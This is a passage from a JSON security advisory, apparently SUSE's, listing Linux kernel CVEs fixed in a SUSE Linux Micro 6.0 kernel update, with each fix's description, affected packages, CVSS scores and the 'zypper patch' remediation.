"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68308",
"url": "https://www.suse.com/security/cve/CVE-2025-68308"
},
{
"category": "external",
"summary": "SUSE Bug 1255149 for CVE-2025-68308",
"url": "https://bugzilla.suse.com/1255149"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68308"
},
{
"cve": "CVE-2025-68312",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68312"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusbnet: Prevents free active kevent\n\nThe root cause of this issue are:\n1. When probing the usbnet device, executing usbnet_link_change(dev, 0, 0);\nput the kevent work in global workqueue. However, the kevent has not yet\nbeen scheduled when the usbnet device is unregistered. Therefore, executing\nfree_netdev() results in the \"free active object (kevent)\" error reported\nhere.\n\n2. Another factor is that when calling usbnet_disconnect()-\u003eunregister_netdev(),\nif the usbnet device is up, ndo_stop() is executed to cancel the kevent.\nHowever, because the device is not up, ndo_stop() is not executed.\n\nThe solution to this problem is to cancel the kevent before executing\nfree_netdev().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68312",
"url": "https://www.suse.com/security/cve/CVE-2025-68312"
},
{
"category": "external",
"summary": "SUSE Bug 1255171 for CVE-2025-68312",
"url": "https://bugzilla.suse.com/1255171"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68312"
},
{
"cve": "CVE-2025-68313",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68313"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/CPU/AMD: Add RDSEED fix for Zen5\n\nThere\u0027s an issue with RDSEED\u0027s 16-bit and 32-bit register output\nvariants on Zen5 which return a random value of 0 \"at a rate inconsistent\nwith randomness while incorrectly signaling success (CF=1)\". Search the\nweb for AMD-SB-7055 for more detail.\n\nAdd a fix glue which checks microcode revisions.\n\n [ bp: Add microcode revisions checking, rewrite. ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68313",
"url": "https://www.suse.com/security/cve/CVE-2025-68313"
},
{
"category": "external",
"summary": "SUSE Bug 1255415 for CVE-2025-68313",
"url": "https://bugzilla.suse.com/1255415"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68313"
},
{
"cve": "CVE-2025-68320",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68320"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlan966x: Fix sleeping in atomic context\n\nThe following warning was seen when we try to connect using ssh to the device.\n\nBUG: sleeping function called from invalid context at kernel/locking/mutex.c:575\nin_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 104, name: dropbear\npreempt_count: 1, expected: 0\nINFO: lockdep is turned off.\nCPU: 0 UID: 0 PID: 104 Comm: dropbear Tainted: G W 6.18.0-rc2-00399-g6f1ab1b109b9-dirty #530 NONE\nTainted: [W]=WARN\nHardware name: Generic DT based system\nCall trace:\n unwind_backtrace from show_stack+0x10/0x14\n show_stack from dump_stack_lvl+0x7c/0xac\n dump_stack_lvl from __might_resched+0x16c/0x2b0\n __might_resched from __mutex_lock+0x64/0xd34\n __mutex_lock from mutex_lock_nested+0x1c/0x24\n mutex_lock_nested from lan966x_stats_get+0x5c/0x558\n lan966x_stats_get from dev_get_stats+0x40/0x43c\n dev_get_stats from dev_seq_printf_stats+0x3c/0x184\n dev_seq_printf_stats from dev_seq_show+0x10/0x30\n dev_seq_show from seq_read_iter+0x350/0x4ec\n seq_read_iter from seq_read+0xfc/0x194\n seq_read from proc_reg_read+0xac/0x100\n proc_reg_read from vfs_read+0xb0/0x2b0\n vfs_read from ksys_read+0x6c/0xec\n ksys_read from ret_fast_syscall+0x0/0x1c\nException stack(0xf0b11fa8 to 0xf0b11ff0)\n1fa0: 00000001 00001000 00000008 be9048d8 00001000 00000001\n1fc0: 00000001 00001000 00000008 00000003 be905920 0000001e 00000000 00000001\n1fe0: 0005404c be9048c0 00018684 b6ec2cd8\n\nIt seems that we are using a mutex in a atomic context which is wrong.\nChange the mutex with a spinlock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68320",
"url": "https://www.suse.com/security/cve/CVE-2025-68320"
},
{
"category": "external",
"summary": "SUSE Bug 1255172 for CVE-2025-68320",
"url": "https://bugzilla.suse.com/1255172"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68320"
},
{
"cve": "CVE-2025-68325",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68325"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_cake: Fix incorrect qlen reduction in cake_drop\n\nIn cake_drop(), qdisc_tree_reduce_backlog() is used to update the qlen\nand backlog of the qdisc hierarchy. Its caller, cake_enqueue(), assumes\nthat the parent qdisc will enqueue the current packet. However, this\nassumption breaks when cake_enqueue() returns NET_XMIT_CN: the parent\nqdisc stops enqueuing current packet, leaving the tree qlen/backlog\naccounting inconsistent. This mismatch can lead to a NULL dereference\n(e.g., when the parent Qdisc is qfq_qdisc).\n\nThis patch computes the qlen/backlog delta in a more robust way by\nobserving the difference before and after the series of cake_drop()\ncalls, and then compensates the qdisc tree accounting if cake_enqueue()\nreturns NET_XMIT_CN.\n\nTo ensure correct compensation when ACK thinning is enabled, a new\nvariable is introduced to keep qlen unchanged.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68325",
"url": "https://www.suse.com/security/cve/CVE-2025-68325"
},
{
"category": "external",
"summary": "SUSE Bug 1255417 for CVE-2025-68325",
"url": "https://bugzilla.suse.com/1255417"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68325"
},
{
"cve": "CVE-2025-68327",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68327"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: renesas_usbhs: Fix synchronous external abort on unbind\n\nA synchronous external abort occurs on the Renesas RZ/G3S SoC if unbind is\nexecuted after the configuration sequence described above:\n\nmodprobe usb_f_ecm\nmodprobe libcomposite\nmodprobe configfs\ncd /sys/kernel/config/usb_gadget\nmkdir -p g1\ncd g1\necho \"0x1d6b\" \u003e idVendor\necho \"0x0104\" \u003e idProduct\nmkdir -p strings/0x409\necho \"0123456789\" \u003e strings/0x409/serialnumber\necho \"Renesas.\" \u003e strings/0x409/manufacturer\necho \"Ethernet Gadget\" \u003e strings/0x409/product\nmkdir -p functions/ecm.usb0\nmkdir -p configs/c.1\nmkdir -p configs/c.1/strings/0x409\necho \"ECM\" \u003e configs/c.1/strings/0x409/configuration\n\nif [ ! -L configs/c.1/ecm.usb0 ]; then\n ln -s functions/ecm.usb0 configs/c.1\nfi\n\necho 11e20000.usb \u003e UDC\necho 11e20000.usb \u003e /sys/bus/platform/drivers/renesas_usbhs/unbind\n\nThe displayed trace is as follows:\n\n Internal error: synchronous external abort: 0000000096000010 [#1] SMP\n CPU: 0 UID: 0 PID: 188 Comm: sh Tainted: G M 6.17.0-rc7-next-20250922-00010-g41050493b2bd #55 PREEMPT\n Tainted: [M]=MACHINE_CHECK\n Hardware name: Renesas SMARC EVK version 2 based on r9a08g045s33 (DT)\n pstate: 604000c5 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs]\n lr : usbhsg_update_pullup+0x3c/0x68 [renesas_usbhs]\n sp : ffff8000838b3920\n x29: ffff8000838b3920 x28: ffff00000d585780 x27: 0000000000000000\n x26: 0000000000000000 x25: 0000000000000000 x24: ffff00000c3e3810\n x23: ffff00000d5e5c80 x22: ffff00000d5e5d40 x21: 0000000000000000\n x20: 0000000000000000 x19: ffff00000d5e5c80 x18: 0000000000000020\n x17: 2e30303230316531 x16: 312d7968703a7968 x15: 3d454d414e5f4344\n x14: 000000000000002c x13: 0000000000000000 x12: 0000000000000000\n x11: ffff00000f358f38 x10: ffff00000f358db0 x9 : ffff00000b41f418\n x8 : 0101010101010101 x7 : 7f7f7f7f7f7f7f7f x6 : fefefeff6364626d\n x5 : 8080808000000000 x4 : 000000004b5ccb9d x3 : 0000000000000000\n x2 : 0000000000000000 x1 : ffff800083790000 x0 : ffff00000d5e5c80\n Call trace:\n usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs] (P)\n usbhsg_pullup+0x4c/0x7c [renesas_usbhs]\n usb_gadget_disconnect_locked+0x48/0xd4\n gadget_unbind_driver+0x44/0x114\n device_remove+0x4c/0x80\n device_release_driver_internal+0x1c8/0x224\n device_release_driver+0x18/0x24\n bus_remove_device+0xcc/0x10c\n device_del+0x14c/0x404\n usb_del_gadget+0x88/0xc0\n usb_del_gadget_udc+0x18/0x30\n usbhs_mod_gadget_remove+0x24/0x44 [renesas_usbhs]\n usbhs_mod_remove+0x20/0x30 [renesas_usbhs]\n usbhs_remove+0x98/0xdc [renesas_usbhs]\n platform_remove+0x20/0x30\n device_remove+0x4c/0x80\n device_release_driver_internal+0x1c8/0x224\n device_driver_detach+0x18/0x24\n unbind_store+0xb4/0xb8\n drv_attr_store+0x24/0x38\n sysfs_kf_write+0x7c/0x94\n kernfs_fop_write_iter+0x128/0x1b8\n vfs_write+0x2ac/0x350\n ksys_write+0x68/0xfc\n __arm64_sys_write+0x1c/0x28\n invoke_syscall+0x48/0x110\n el0_svc_common.constprop.0+0xc0/0xe0\n do_el0_svc+0x1c/0x28\n el0_svc+0x34/0xf0\n el0t_64_sync_handler+0xa0/0xe4\n el0t_64_sync+0x198/0x19c\n Code: 7100003f 1a9f07e1 531c6c22 f9400001 (79400021)\n ---[ end trace 0000000000000000 ]---\n note: sh[188] exited with irqs disabled\n note: sh[188] exited with preempt_count 1\n\nThe issue occurs because usbhs_sys_function_pullup(), which accesses the IP\nregisters, is executed after the USBHS clocks have been disabled. The\nproblem is reproducible on the Renesas RZ/G3S SoC starting with the\naddition of module stop in the clock enable/disable APIs. With module stop\nfunctionality enabled, a bus error is expected if a master accesses a\nmodule whose clock has been stopped and module stop activated.\n\nDisable the IP clocks at the end of remove.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68327",
"url": "https://www.suse.com/security/cve/CVE-2025-68327"
},
{
"category": "external",
"summary": "SUSE Bug 1255488 for CVE-2025-68327",
"url": "https://bugzilla.suse.com/1255488"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68327"
},
{
"cve": "CVE-2025-68328",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68328"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirmware: stratix10-svc: fix bug in saving controller data\n\nFix the incorrect usage of platform_set_drvdata and dev_set_drvdata. They\nboth are of the same data and overrides each other. This resulted in the\nrmmod of the svc driver to fail and throw a kernel panic for kthread_stop\nand fifo free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
